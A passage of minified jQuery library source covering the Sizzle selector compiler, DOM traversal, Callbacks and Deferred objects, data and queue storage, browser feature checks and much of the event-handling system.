wb(a,b,c,d,e,f){return d&&!d[u]&&(d=wb(d)),e&&!e[u]&&(e=wb(e,f)),ib(function(f,g,h,i){var j,k,l,m=[],n=[],o=g.length,p=f||ub(b||"*",h.nodeType?[h]:h,[]),q=!a||!f&&b?p:vb(p,m,a,h,i),r=c?e||(f?a:o||d)?[]:g:q;if(c&&c(q,r,h,i),d){j=vb(r,n),d(j,[],h,i),k=j.length;while(k--)(l=j[k])&&(r[n[k]]=!(q[n[k]]=l))}if(f){if(e||a){if(e){j=[],k=r.length;while(k--)(l=r[k])&&j.push(q[k]=l);e(null,r=[],j,i)}k=r.length;while(k--)(l=r[k])&&(j=e?J(f,l):m[k])>-1&&(f[j]=!(g[j]=l))}}else r=vb(r===g?r.splice(o,r.length):r),e?e(null,g,r,i):H.apply(g,r)})}function xb(a){for(var b,c,e,f=a.length,g=d.relative[a[0].type],h=g||d.relative[" "],i=g?1:0,k=sb(function(a){return a===b},h,!0),l=sb(function(a){return J(b,a)>-1},h,!0),m=[function(a,c,d){var e=!g&&(d||c!==j)||((b=c).nodeType?k(a,c,d):l(a,c,d));return b=null,e}];f>i;i++)if(c=d.relative[a[i].type])m=[sb(tb(m),c)];else{if(c=d.filter[a[i].type].apply(null,a[i].matches),c[u]){for(e=++i;f>e;e++)if(d.relative[a[e].type])break;return wb(i>1&&tb(m),i>1&&rb(a.slice(0,i-1).concat({value:" "===a[i-2].type?"*":""})).replace(R,"$1"),c,e>i&&xb(a.slice(i,e)),f>e&&xb(a=a.slice(e)),f>e&&rb(a))}m.push(c)}return tb(m)}function yb(a,b){var c=b.length>0,e=a.length>0,f=function(f,g,h,i,k){var l,m,o,p=0,q="0",r=f&&[],s=[],t=j,u=f||e&&d.find.TAG("*",k),v=w+=null==t?1:Math.random()||.1,x=u.length;for(k&&(j=g!==n&&g);q!==x&&null!=(l=u[q]);q++){if(e&&l){m=0;while(o=a[m++])if(o(l,g,h)){i.push(l);break}k&&(w=v)}c&&((l=!o&&l)&&p--,f&&r.push(l))}if(p+=q,c&&q!==p){m=0;while(o=b[m++])o(r,s,g,h);if(f){if(p>0)while(q--)r[q]||s[q]||(s[q]=F.call(i));s=vb(s)}H.apply(i,s),k&&!f&&s.length>0&&p+b.length>1&&gb.uniqueSort(i)}return k&&(w=v,j=t),r};return c?ib(f):f}return h=gb.compile=function(a,b){var c,d=[],e=[],f=A[a+" "];if(!f){b||(b=g(a)),c=b.length;while(c--)f=xb(b[c]),f[u]?d.push(f):e.push(f);f=A(a,yb(e,d)),f.selector=a}return f},i=gb.select=function(a,b,e,f){var i,j,k,l,m,n="function"==typeof a&&a,o=!f&&g(a=n.selector||a);if(e=e||[],1===o.length){if(j=o[0]=o[0].slice(0),j.length>2&&"ID"===(k=j[0]).type&&c.getById&&9===b.nodeType&&p&&d.relative[j[1].type]){if(b=(d.find.ID(k.matches[0].replace(cb,db),b)||[])[0],!b)return e;n&&(b=b.parentNode),a=a.slice(j.shift().value.length)}i=X.needsContext.test(a)?0:j.length;while(i--){if(k=j[i],d.relative[l=k.type])break;if((m=d.find[l])&&(f=m(k.matches[0].replace(cb,db),ab.test(j[0].type)&&pb(b.parentNode)||b))){if(j.splice(i,1),a=f.length&&rb(j),!a)return H.apply(e,f),e;break}}}return(n||h(a,o))(f,b,!p,e,ab.test(a)&&pb(b.parentNode)||b),e},c.sortStable=u.split("").sort(B).join("")===u,c.detectDuplicates=!!l,m(),c.sortDetached=jb(function(a){return 1&a.compareDocumentPosition(n.createElement("div"))}),jb(function(a){return a.innerHTML="<a href='#'></a>","#"===a.firstChild.getAttribute("href")})||kb("type|href|height|width",function(a,b,c){return c?void 0:a.getAttribute(b,"type"===b.toLowerCase()?1:2)}),c.attributes&&jb(function(a){return a.innerHTML="<input/>",a.firstChild.setAttribute("value",""),""===a.firstChild.getAttribute("value")})||kb("value",function(a,b,c){return c||"input"!==a.nodeName.toLowerCase()?void 0:a.defaultValue}),jb(function(a){return null==a.getAttribute("disabled")})||kb(K,function(a,b,c){var d;return c?void 0:a[b]===!0?b.toLowerCase():(d=a.getAttributeNode(b))&&d.specified?d.value:null}),gb}(a);m.find=s,m.expr=s.selectors,m.expr[":"]=m.expr.pseudos,m.unique=s.uniqueSort,m.text=s.getText,m.isXMLDoc=s.isXML,m.contains=s.contains;var t=m.expr.match.needsContext,u=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,v=/^.[^:#\[\.,]*$/;function w(a,b,c){if(m.isFunction(b))return m.grep(a,function(a,d){return!!b.call(a,d,a)!==c});if(b.nodeType)return m.grep(a,function(a){return a===b!==c});if("string"==typeof b){if(v.test(b))return m.filter(b,a,c);b=m.filter(b,a)}return m.grep(a,function(a){return m.inArray(a,b)>=0!==c})}m.filter=function(a,b,c){var d=b[0];return c&&(a=":not("+a+")"),1===b.length&&1===d.nodeType?m.find.matchesSelector(d,a)?[d]:[]:m.find.matches(a,m.grep(b,function(a){return 1===a.nodeType}))},m.fn.extend({find:function(a){var b,c=[],d=this,e=d.length;if("string"!=typeof a)return this.pushStack(m(a).filter(function(){for(b=0;e>b;b++)if(m.contains(d[b],this))return!0}));for(b=0;e>b;b++)m.find(a,d[b],c);return c=this.pushStack(e>1?m.unique(c):c),c.selector=this.selector?this.selector+" "+a:a,c},filter:function(a){return this.pushStack(w(this,a||[],!1))},not:function(a){return this.pushStack(w(this,a||[],!0))},is:function(a){return!!w(this,"string"==typeof a&&t.test(a)?m(a):a||[],!1).length}});var x,y=a.document,z=/^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]*))$/,A=m.fn.init=function(a,b){var c,d;if(!a)return this;if("string"==typeof a){if(c="<"===a.charAt(0)&&">"===a.charAt(a.length-1)&&a.length>=3?[null,a,null]:z.exec(a),!c||!c[1]&&b)return!b||b.jquery?(b||x).find(a):this.constructor(b).find(a);if(c[1]){if(b=b instanceof m?b[0]:b,m.merge(this,m.parseHTML(c[1],b&&b.nodeType?b.ownerDocument||b:y,!0)),u.test(c[1])&&m.isPlainObject(b))for(c in b)m.isFunction(this[c])?this[c](b[c]):this.attr(c,b[c]);return this}if(d=y.getElementById(c[2]),d&&d.parentNode){if(d.id!==c[2])return x.find(a);this.length=1,this[0]=d}return this.context=y,this.selector=a,this}return a.nodeType?(this.context=this[0]=a,this.length=1,this):m.isFunction(a)?"undefined"!=typeof x.ready?x.ready(a):a(m):(void 0!==a.selector&&(this.selector=a.selector,this.context=a.context),m.makeArray(a,this))};A.prototype=m.fn,x=m(y);var B=/^(?:parents|prev(?:Until|All))/,C={children:!0,contents:!0,next:!0,prev:!0};m.extend({dir:function(a,b,c){var d=[],e=a[b];while(e&&9!==e.nodeType&&(void 0===c||1!==e.nodeType||!m(e).is(c)))1===e.nodeType&&d.push(e),e=e[b];return d},sibling:function(a,b){for(var c=[];a;a=a.nextSibling)1===a.nodeType&&a!==b&&c.push(a);return c}}),m.fn.extend({has:function(a){var b,c=m(a,this),d=c.length;return this.filter(function(){for(b=0;d>b;b++)if(m.contains(this,c[b]))return!0})},closest:function(a,b){for(var c,d=0,e=this.length,f=[],g=t.test(a)||"string"!=typeof a?m(a,b||this.context):0;e>d;d++)for(c=this[d];c&&c!==b;c=c.parentNode)if(c.nodeType<11&&(g?g.index(c)>-1:1===c.nodeType&&m.find.matchesSelector(c,a))){f.push(c);break}return this.pushStack(f.length>1?m.unique(f):f)},index:function(a){return a?"string"==typeof a?m.inArray(this[0],m(a)):m.inArray(a.jquery?a[0]:a,this):this[0]&&this[0].parentNode?this.first().prevAll().length:-1},add:function(a,b){return this.pushStack(m.unique(m.merge(this.get(),m(a,b))))},addBack:function(a){return this.add(null==a?this.prevObject:this.prevObject.filter(a))}});function D(a,b){do a=a[b];while(a&&1!==a.nodeType);return a}m.each({parent:function(a){var b=a.parentNode;return b&&11!==b.nodeType?b:null},parents:function(a){return m.dir(a,"parentNode")},parentsUntil:function(a,b,c){return m.dir(a,"parentNode",c)},next:function(a){return D(a,"nextSibling")},prev:function(a){return D(a,"previousSibling")},nextAll:function(a){return m.dir(a,"nextSibling")},prevAll:function(a){return m.dir(a,"previousSibling")},nextUntil:function(a,b,c){return m.dir(a,"nextSibling",c)},prevUntil:function(a,b,c){return m.dir(a,"previousSibling",c)},siblings:function(a){return m.sibling((a.parentNode||{}).firstChild,a)},children:function(a){return m.sibling(a.firstChild)},contents:function(a){return m.nodeName(a,"iframe")?a.contentDocument||a.contentWindow.document:m.merge([],a.childNodes)}},function(a,b){m.fn[a]=function(c,d){var e=m.map(this,b,c);return"Until"!==a.slice(-5)&&(d=c),d&&"string"==typeof d&&(e=m.filter(d,e)),this.length>1&&(C[a]||(e=m.unique(e)),B.test(a)&&(e=e.reverse())),this.pushStack(e)}});var E=/\S+/g,F={};function G(a){var b=F[a]={};return m.each(a.match(E)||[],function(a,c){b[c]=!0}),b}m.Callbacks=function(a){a="string"==typeof a?F[a]||G(a):m.extend({},a);var b,c,d,e,f,g,h=[],i=!a.once&&[],j=function(l){for(c=a.memory&&l,d=!0,f=g||0,g=0,e=h.length,b=!0;h&&e>f;f++)if(h[f].apply(l[0],l[1])===!1&&a.stopOnFalse){c=!1;break}b=!1,h&&(i?i.length&&j(i.shift()):c?h=[]:k.disable())},k={add:function(){if(h){var d=h.length;!function f(b){m.each(b,function(b,c){var d=m.type(c);"function"===d?a.unique&&k.has(c)||h.push(c):c&&c.length&&"string"!==d&&f(c)})}(arguments),b?e=h.length:c&&(g=d,j(c))}return this},remove:function(){return h&&m.each(arguments,function(a,c){var d;while((d=m.inArray(c,h,d))>-1)h.splice(d,1),b&&(e>=d&&e--,f>=d&&f--)}),this},has:function(a){return a?m.inArray(a,h)>-1:!(!h||!h.length)},empty:function(){return h=[],e=0,this},disable:function(){return h=i=c=void 0,this},disabled:function(){return!h},lock:function(){return i=void 0,c||k.disable(),this},locked:function(){return!i},fireWith:function(a,c){return!h||d&&!i||(c=c||[],c=[a,c.slice?c.slice():c],b?i.push(c):j(c)),this},fire:function(){return k.fireWith(this,arguments),this},fired:function(){return!!d}};return k},m.extend({Deferred:function(a){var b=[["resolve","done",m.Callbacks("once memory"),"resolved"],["reject","fail",m.Callbacks("once memory"),"rejected"],["notify","progress",m.Callbacks("memory")]],c="pending",d={state:function(){return c},always:function(){return e.done(arguments).fail(arguments),this},then:function(){var a=arguments;return m.Deferred(function(c){m.each(b,function(b,f){var g=m.isFunction(a[b])&&a[b];e[f[1]](function(){var a=g&&g.apply(this,arguments);a&&m.isFunction(a.promise)?a.promise().done(c.resolve).fail(c.reject).progress(c.notify):c[f[0]+"With"](this===d?c.promise():this,g?[a]:arguments)})}),a=null}).promise()},promise:function(a){return null!=a?m.extend(a,d):d}},e={};return d.pipe=d.then,m.each(b,function(a,f){var g=f[2],h=f[3];d[f[1]]=g.add,h&&g.add(function(){c=h},b[1^a][2].disable,b[2][2].lock),e[f[0]]=function(){return e[f[0]+"With"](this===e?d:this,arguments),this},e[f[0]+"With"]=g.fireWith}),d.promise(e),a&&a.call(e,e),e},when:function(a){var b=0,c=d.call(arguments),e=c.length,f=1!==e||a&&m.isFunction(a.promise)?e:0,g=1===f?a:m.Deferred(),h=function(a,b,c){return function(e){b[a]=this,c[a]=arguments.length>1?d.call(arguments):e,c===i?g.notifyWith(b,c):--f||g.resolveWith(b,c)}},i,j,k;if(e>1)for(i=new Array(e),j=new Array(e),k=new Array(e);e>b;b++)c[b]&&m.isFunction(c[b].promise)?c[b].promise().done(h(b,k,c)).fail(g.reject).progress(h(b,j,i)):--f;return f||g.resolveWith(k,c),g.promise()}});var H;m.fn.ready=function(a){return m.ready.promise().done(a),this},m.extend({isReady:!1,readyWait:1,holdReady:function(a){a?m.readyWait++:m.ready(!0)},ready:function(a){if(a===!0?!--m.readyWait:!m.isReady){if(!y.body)return setTimeout(m.ready);m.isReady=!0,a!==!0&&--m.readyWait>0||(H.resolveWith(y,[m]),m.fn.triggerHandler&&(m(y).triggerHandler("ready"),m(y).off("ready")))}}});function I(){y.addEventListener?(y.removeEventListener("DOMContentLoaded",J,!1),a.removeEventListener("load",J,!1)):(y.detachEvent("onreadystatechange",J),a.detachEvent("onload",J))}function J(){(y.addEventListener||"load"===event.type||"complete"===y.readyState)&&(I(),m.ready())}m.ready.promise=function(b){if(!H)if(H=m.Deferred(),"complete"===y.readyState)setTimeout(m.ready);else if(y.addEventListener)y.addEventListener("DOMContentLoaded",J,!1),a.addEventListener("load",J,!1);else{y.attachEvent("onreadystatechange",J),a.attachEvent("onload",J);var c=!1;try{c=null==a.frameElement&&y.documentElement}catch(d){}c&&c.doScroll&&!function e(){if(!m.isReady){try{c.doScroll("left")}catch(a){return setTimeout(e,50)}I(),m.ready()}}()}return H.promise(b)};var K="undefined",L;for(L in m(k))break;k.ownLast="0"!==L,k.inlineBlockNeedsLayout=!1,m(function(){var a,b,c,d;c=y.getElementsByTagName("body")[0],c&&c.style&&(b=y.createElement("div"),d=y.createElement("div"),d.style.cssText="position:absolute;border:0;width:0;height:0;top:0;left:-9999px",c.appendChild(d).appendChild(b),typeof b.style.zoom!==K&&(b.style.cssText="display:inline;margin:0;border:0;padding:1px;width:1px;zoom:1",k.inlineBlockNeedsLayout=a=3===b.offsetWidth,a&&(c.style.zoom=1)),c.removeChild(d))}),function(){var a=y.createElement("div");if(null==k.deleteExpando){k.deleteExpando=!0;try{delete a.test}catch(b){k.deleteExpando=!1}}a=null}(),m.acceptData=function(a){var b=m.noData[(a.nodeName+" ").toLowerCase()],c=+a.nodeType||1;return 1!==c&&9!==c?!1:!b||b!==!0&&a.getAttribute("classid")===b};var M=/^(?:\{[\w\W]*\}|\[[\w\W]*\])$/,N=/([A-Z])/g;function O(a,b,c){if(void 0===c&&1===a.nodeType){var d="data-"+b.replace(N,"-$1").toLowerCase();if(c=a.getAttribute(d),"string"==typeof c){try{c="true"===c?!0:"false"===c?!1:"null"===c?null:+c+""===c?+c:M.test(c)?m.parseJSON(c):c}catch(e){}m.data(a,b,c)}else c=void 0}return c}function P(a){var b;for(b in a)if(("data"!==b||!m.isEmptyObject(a[b]))&&"toJSON"!==b)return!1;
return!0}function Q(a,b,d,e){if(m.acceptData(a)){var f,g,h=m.expando,i=a.nodeType,j=i?m.cache:a,k=i?a[h]:a[h]&&h;if(k&&j[k]&&(e||j[k].data)||void 0!==d||"string"!=typeof b)return k||(k=i?a[h]=c.pop()||m.guid++:h),j[k]||(j[k]=i?{}:{toJSON:m.noop}),("object"==typeof b||"function"==typeof b)&&(e?j[k]=m.extend(j[k],b):j[k].data=m.extend(j[k].data,b)),g=j[k],e||(g.data||(g.data={}),g=g.data),void 0!==d&&(g[m.camelCase(b)]=d),"string"==typeof b?(f=g[b],null==f&&(f=g[m.camelCase(b)])):f=g,f}}function R(a,b,c){if(m.acceptData(a)){var d,e,f=a.nodeType,g=f?m.cache:a,h=f?a[m.expando]:m.expando;if(g[h]){if(b&&(d=c?g[h]:g[h].data)){m.isArray(b)?b=b.concat(m.map(b,m.camelCase)):b in d?b=[b]:(b=m.camelCase(b),b=b in d?[b]:b.split(" ")),e=b.length;while(e--)delete d[b[e]];if(c?!P(d):!m.isEmptyObject(d))return}(c||(delete g[h].data,P(g[h])))&&(f?m.cleanData([a],!0):k.deleteExpando||g!=g.window?delete g[h]:g[h]=null)}}}m.extend({cache:{},noData:{"applet ":!0,"embed ":!0,"object ":"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"},hasData:function(a){return a=a.nodeType?m.cache[a[m.expando]]:a[m.expando],!!a&&!P(a)},data:function(a,b,c){return Q(a,b,c)},removeData:function(a,b){return R(a,b)},_data:function(a,b,c){return Q(a,b,c,!0)},_removeData:function(a,b){return R(a,b,!0)}}),m.fn.extend({data:function(a,b){var c,d,e,f=this[0],g=f&&f.attributes;if(void 0===a){if(this.length&&(e=m.data(f),1===f.nodeType&&!m._data(f,"parsedAttrs"))){c=g.length;while(c--)g[c]&&(d=g[c].name,0===d.indexOf("data-")&&(d=m.camelCase(d.slice(5)),O(f,d,e[d])));m._data(f,"parsedAttrs",!0)}return e}return"object"==typeof a?this.each(function(){m.data(this,a)}):arguments.length>1?this.each(function(){m.data(this,a,b)}):f?O(f,a,m.data(f,a)):void 0},removeData:function(a){return this.each(function(){m.removeData(this,a)})}}),m.extend({queue:function(a,b,c){var d;return a?(b=(b||"fx")+"queue",d=m._data(a,b),c&&(!d||m.isArray(c)?d=m._data(a,b,m.makeArray(c)):d.push(c)),d||[]):void 0},dequeue:function(a,b){b=b||"fx";var c=m.queue(a,b),d=c.length,e=c.shift(),f=m._queueHooks(a,b),g=function(){m.dequeue(a,b)};"inprogress"===e&&(e=c.shift(),d--),e&&("fx"===b&&c.unshift("inprogress"),delete f.stop,e.call(a,g,f)),!d&&f&&f.empty.fire()},_queueHooks:function(a,b){var c=b+"queueHooks";return m._data(a,c)||m._data(a,c,{empty:m.Callbacks("once memory").add(function(){m._removeData(a,b+"queue"),m._removeData(a,c)})})}}),m.fn.extend({queue:function(a,b){var c=2;return"string"!=typeof a&&(b=a,a="fx",c--),arguments.length<c?m.queue(this[0],a):void 0===b?this:this.each(function(){var c=m.queue(this,a,b);m._queueHooks(this,a),"fx"===a&&"inprogress"!==c[0]&&m.dequeue(this,a)})},dequeue:function(a){return this.each(function(){m.dequeue(this,a)})},clearQueue:function(a){return this.queue(a||"fx",[])},promise:function(a,b){var c,d=1,e=m.Deferred(),f=this,g=this.length,h=function(){--d||e.resolveWith(f,[f])};"string"!=typeof a&&(b=a,a=void 0),a=a||"fx";while(g--)c=m._data(f[g],a+"queueHooks"),c&&c.empty&&(d++,c.empty.add(h));return h(),e.promise(b)}});var S=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,T=["Top","Right","Bottom","Left"],U=function(a,b){return a=b||a,"none"===m.css(a,"display")||!m.contains(a.ownerDocument,a)},V=m.access=function(a,b,c,d,e,f,g){var h=0,i=a.length,j=null==c;if("object"===m.type(c)){e=!0;for(h in c)m.access(a,b,h,c[h],!0,f,g)}else if(void 0!==d&&(e=!0,m.isFunction(d)||(g=!0),j&&(g?(b.call(a,d),b=null):(j=b,b=function(a,b,c){return j.call(m(a),c)})),b))for(;i>h;h++)b(a[h],c,g?d:d.call(a[h],h,b(a[h],c)));return e?a:j?b.call(a):i?b(a[0],c):f},W=/^(?:checkbox|radio)$/i;!function(){var a=y.createElement("input"),b=y.createElement("div"),c=y.createDocumentFragment();if(b.innerHTML="  <link/><table></table><a href='/a'>a</a><input type='checkbox'/>",k.leadingWhitespace=3===b.firstChild.nodeType,k.tbody=!b.getElementsByTagName("tbody").length,k.htmlSerialize=!!b.getElementsByTagName("link").length,k.html5Clone="<:nav></:nav>"!==y.createElement("nav").cloneNode(!0).outerHTML,a.type="checkbox",a.checked=!0,c.appendChild(a),k.appendChecked=a.checked,b.innerHTML="<textarea>x</textarea>",k.noCloneChecked=!!b.cloneNode(!0).lastChild.defaultValue,c.appendChild(b),b.innerHTML="<input type='radio' checked='checked' name='t'/>",k.checkClone=b.cloneNode(!0).cloneNode(!0).lastChild.checked,k.noCloneEvent=!0,b.attachEvent&&(b.attachEvent("onclick",function(){k.noCloneEvent=!1}),b.cloneNode(!0).click()),null==k.deleteExpando){k.deleteExpando=!0;try{delete b.test}catch(d){k.deleteExpando=!1}}}(),function(){var b,c,d=y.createElement("div");for(b in{submit:!0,change:!0,focusin:!0})c="on"+b,(k[b+"Bubbles"]=c in a)||(d.setAttribute(c,"t"),k[b+"Bubbles"]=d.attributes[c].expando===!1);d=null}();var X=/^(?:input|select|textarea)$/i,Y=/^key/,Z=/^(?:mouse|pointer|contextmenu)|click/,$=/^(?:focusinfocus|focusoutblur)$/,_=/^([^.]*)(?:\.(.+)|)$/;function ab(){return!0}function bb(){return!1}function cb(){try{return y.activeElement}catch(a){}}m.event={global:{},add:function(a,b,c,d,e){var f,g,h,i,j,k,l,n,o,p,q,r=m._data(a);if(r){c.handler&&(i=c,c=i.handler,e=i.selector),c.guid||(c.guid=m.guid++),(g=r.events)||(g=r.events={}),(k=r.handle)||(k=r.handle=function(a){return typeof m===K||a&&m.event.triggered===a.type?void 0:m.event.dispatch.apply(k.elem,arguments)},k.elem=a),b=(b||"").match(E)||[""],h=b.length;while(h--)f=_.exec(b[h])||[],o=q=f[1],p=(f[2]||"").split(".").sort(),o&&(j=m.event.special[o]||{},o=(e?j.delegateType:j.bindType)||o,j=m.event.special[o]||{},l=m.extend({type:o,origType:q,data:d,handler:c,guid:c.guid,selector:e,needsContext:e&&m.expr.match.needsContext.test(e),namespace:p.join(".")},i),(n=g[o])||(n=g[o]=[],n.delegateCount=0,j.setup&&j.setup.call(a,d,p,k)!==!1||(a.addEventListener?a.addEventListener(o,k,!1):a.attachEvent&&a.attachEvent("on"+o,k))),j.add&&(j.add.call(a,l),l.handler.guid||(l.handler.guid=c.guid)),e?n.splice(n.delegateCount++,0,l):n.push(l),m.event.global[o]=!0);a=null}},remove:function(a,b,c,d,e){var f,g,h,i,j,k,l,n,o,p,q,r=m.hasData(a)&&m._data(a);if(r&&(k=r.events)){b=(b||"").match(E)||[""],j=b.length;while(j--)if(h=_.exec(b[j])||[],o=q=h[1],p=(h[2]||"").split(".").sort(),o){l=m.event.special[o]||{},o=(d?l.delegateType:l.bindType)||o,n=k[o]||[],h=h[2]&&new RegExp("(^|\\.)"+p.join("\\.(?:.*\\.|)")+"(\\.|$)"),i=f=n.length;while(f--)g=n[f],!e&&q!==g.origType||c&&c.guid!==g.guid||h&&!h.test(g.namespace)||d&&d!==g.selector&&("**"!==d||!g.selector)||(n.splice(f,1),g.selector&&n.delegateCount--,l.remove&&l.remove.call(a,g));i&&!n.length&&(l.teardown&&l.teardown.call(a,p,r.handle)!==!1||m.removeEvent(a,o,r.handle),delete k[o])}else for(o in k)m.event.remove(a,o+b[j],c,d,!0);m.isEmptyObject(k)&&(delete r.handle,m._removeData(a,"events"))}},trigger:function(b,c,d,e){var f,g,h,i,k,l,n,o=[d||y],p=j.call(b,"type")?b.type:b,q=j.call(b,"namespace")?b.namespace.split("."):[];if(h=l=d=d||y,3!==d.nodeType&&8!==d.nodeType&&!$.test(p+m.event.triggered)&&(p.indexOf(".")>=0&&(q=p.split("."),p=q.shift(),q.sort()),g=p.indexOf(":")<0&&"on"+p,b=b[m.expando]?b:new m.Event(p,"object"==typeof b&&b),b.isTrigger=e?2:3,b.namespace=q.join("."),b.namespace_re=b.namespace?new RegExp("(^|\\.)"+q.join("\\.(?:.*\\.|)")+"(\\.|$)"):null,b.result=void 0,b.target||(b.target=d),c=null==c?[b]:m.makeArray(c,[b]),k=m.event.special[p]||{},e||!k.trigger||k.trigger.apply(d,c)!==!1)){if(!e&&!k.noBubble&&!m.isWindow(d)){for(i=k.delegateType||p,$.test(i+p)||(h=h.parentNode);h;h=h.parentNode)o.push(h),l=h;l===(d.ownerDocument||y)&&o.push(l.defaultView||l.parentWindow||a)}n=0;while((h=o[n++])&&!b.isPropagationStopped())b.type=n>1?i:k.bindType||p,f=(m._data(h,"events")||{})[b.type]&&m._data(h,"handle"),f&&f.apply(h,c),f=g&&h[g],f&&f.apply&&m.acceptData(h)&&(b.result=f.apply(h,c),b.result===!1&&b.preventDefault());if(b.type=p,!e&&!b.isDefaultPrevented()&&(!k._default||k._default.apply(o.pop(),c)===!1)&&m.acceptData(d)&&g&&d[p]&&!m.isWindow(d)){l=d[g],l&&(d[g]=null),m.event.triggered=p;try{d[p]()}catch(r){}m.event.triggered=void 0,l&&(d[g]=l)}return b.result}},dispatch:function(a){a=m.event.fix(a);var b,c,e,f,g,h=[],i=d.call(arguments),j=(m._data(this,"events")||{})[a.type]||[],k=m.event.special[a.type]||{};if(i[0]=a,a.delegateTarget=this,!k.preDispatch||k.preDispatch.call(this,a)!==!1){h=m.event.handlers.call(this,a,j),b=0;while((f=h[b++])&&!a.isPropagationStopped()){a.currentTarget=f.elem,g=0;while((e=f.handlers[g++])&&!a.isImmediatePropagationStopped())(!a.namespace_re||a.namespace_re.test(e.namespace))&&(a.handleObj=e,a.data=e.data,c=((m.event.special[e.origType]||{}).handle||e.handler).apply(f.elem,i),void 0!==c&&(a.result=c)===!1&&(a.preventDefault(),a.stopPropagation()))}return k.postDispatch&&k.postDispatch.call(this,a),a.result}},handlers:function(a,b){var c,d,e,f,g=[],h=b.delegateCount,i=a.target;if(h&&i.nodeType&&(!a.button||"click"!==a.type))for(;i!=this;i=i.parentNode||this)if(1===i.nodeType&&(i.disabled!==!0||"click"!==a.type)){for(e=[],f=0;h>f;f++)d=b[f],c=d.selector+" ",void 0===e[c]&&(e[c]=d.needsContext?m(c,this).index(i)>=0:m.find(c,this,null,[i]).length),e[c]&&e.push(d);e.length&&g.push({elem:i,handlers:e})}return h<b.length&&g.push({elem:this,handlers:b.slice(h)}),g},fix:function(a){if(a[m.expando])return a;var b,c,d,e=a.type,f=a,g=this.fixHooks[e];g||(this.fixHooks[e]=g=Z.test(e)?this.mouseHooks:Y.test(e)?this.keyHooks:{}),d=g.props?this.props.concat(g.props):this.props,a=new m.Event(f),b=d.length;while(b--)c=d[b],a[c]=f[c];return a.target||(a.target=f.srcElement||y),3===a.target.nodeType&&(a.target=a.target.parentNode),a.metaKey=!!a.metaKey,g.filter?g.filter(a,f):a},props:"altKey bubbles cancelable ctrlKey currentTarget eventPhase metaKey relatedTarget shiftKey target timeStamp view which".split(" "),fixHooks:{},keyHooks:{props:"char charCode key keyCode".split(" "),filter:function(a,b){return null==a.which&&(a.which=null!=b.charCode?b.charCode:b.keyCode),a}},mouseHooks:{props:"button buttons clientX clientY fromElement offsetX offsetY pageX pageY screenX screenY toElement".split(" "),filter:function(a,b){var c,d,e,f=b.button,g=b.fromElement;return null==a.pageX&&null!=b.clientX&&(d=a.target.ownerDocument||y,e=d.documentElement,c=d.body,a.pageX=b.clientX+(e&&e.scrollLeft||c&&c.scrollLeft||0)-(e&&e.clientLeft||c&&c.clientLeft||0),a.pageY=b.clientY+(e&&e.scrollTop||c&&c.scrollTop||0)-(e&&e.clientTop||c&&c.clientTop||0)),!a.relatedTarget&&g&&(a.relatedTarget=g===a.target?b.toElement:g),a.which||void 0===f||(a.which=1&f?1:2&f?3:4&f?2:0),a}},special:{load:{noBubble:!0},focus:{trigger:function(){if(this!==cb()&&this.focus)try{return this.focus(),!1}catch(a){}},delegateType:"focusin"},blur:{trigger:function(){return this===cb()&&this.blur?(this.blur(),!1):void 0},delegateType:"focusout"},click:{trigger:function(){return m.nodeName(this,"input")&&"checkbox"===this.type&&this.click?(this.click(),!1):void 0},_default:function(a){return m.nodeName(a.target,"a")}},beforeunload:{postDispatch:function(a){void 0!==a.result&&a.originalEvent&&(a.originalEvent.returnValue=a.result)}}},simulate:function(a,b,c,d){var e=m.extend(new m.Event,c,{type:a,isSimulated:!0,originalEvent:{}});d?m.event.trigger(e,null,b):m.event.dispatch.call(b,e),e.isDefaultPrevented()&&c.preventDefault()}},m.removeEvent=y.removeEventListener?function(a,b,c){a.removeEventListener&&a.removeEventListener(b,c,!1)}:function(a,b,c){var d="on"+b;a.detachEvent&&(typeof a[d]===K&&(a[d]=null),a.detachEvent(d,c))},m.Event=function(a,b){return this instanceof m.Event?(a&&a.type?(this.originalEvent=a,this.type=a.type,this.isDefaultPrevented=a.defaultPrevented||void 0===a.defaultPrevented&&a.returnValue===!1?ab:bb):this.type=a,b&&m.extend(this,b),this.timeStamp=a&&a.timeStamp||m.now(),void(this[m.expando]=!0)):new m.Event(a,b)},m.Event.prototype={isDefaultPrevented:bb,isPropagationStopped:bb,isImmediatePropagationStopped:bb,preventDefault:function(){var a=this.originalEvent;this.isDefaultPrevented=ab,a&&(a.preventDefault?a.preventDefault():a.returnValue=!1)},stopPropagation:function(){var a=this.originalEvent;this.isPropagationStopped=ab,a&&(a.stopPropagation&&a.stopPropagation(),a.cancelBubble=!0)},stopImmediatePropagation:function(){var a=this.originalEvent;this.isImmediatePropagationStopped=ab,a&&a.stopImmediatePropagation&&a.stopImmediatePropagation(),this.stopPropagation()}},m.each({mouseenter:"mouseover",mouseleave:"mouseout",pointerenter:"pointerover",pointerleave:"pointerout"},function(a,b){m.event.special[a]={delegateType:b,bindType:b,handle:function(a){var c,d=this,e=a.relatedTarget,f=a.handleObj;return(!e||e!==d&&!m.contains(d,e))&&(a.type=f.origType,c=f.handler.apply(this,arguments),a.type=b),c}}}),k.submitBubbles||(m.event.special.submit={setup:function(){return m.nodeName(this,"form")?!1:void m.event.add(this,"click._submit keypress._submit",function(a){var b=a.target,c=m.nodeName(b,"input")||m.nodeName(b,"button")?b.form:void 0;c&&!m._data(c,"submitBubbles")&&(m.event.add(c,"submit._submit",function(a){a._submit_bubble=!0}),m._data(c,"submitBubbles",!0))})},postDispatch:function(a){a._submit_bubble&&(delete a._submit_bubble,this.parentNode&&!a.isTrigger&&m.event.simulate("submit",this.parentNode,a,!0))},teardown:function(){return m.nodeName(this,"form")?!1:void m.event.remove(this,"._submit")}}),k.changeBubbles||(m.event.special.change={setup:function(){return X.test(this.nodeName)?(("checkbox"===this.type||"radio"===this.type)&&(m.event.add(this,"propertychange._change",function(a){"checked"===a.originalEvent.propertyName&&(this._just_changed=!0)}),m.event.add(this,"click._change",function(a){this._just_changed&&!a.isTrigger&&(this._just_changed=!1),m.event.simulate("change",this,a,!0)})),!1):void m.event.add(this,"beforeactivate._change",function(a){var b=a.target;X.test(b.nodeName)&&!m._data(b,"changeBubbles")&&(m.event.add(b,"change._change",function(a){!this.parentNode||a.isSimulated||a.isTrigger||m.event.simulate("change",this.parentNode,a,!0)}),m._data(b,"changeBubbles",!0))})},handle:function(a){var b=a.target;return 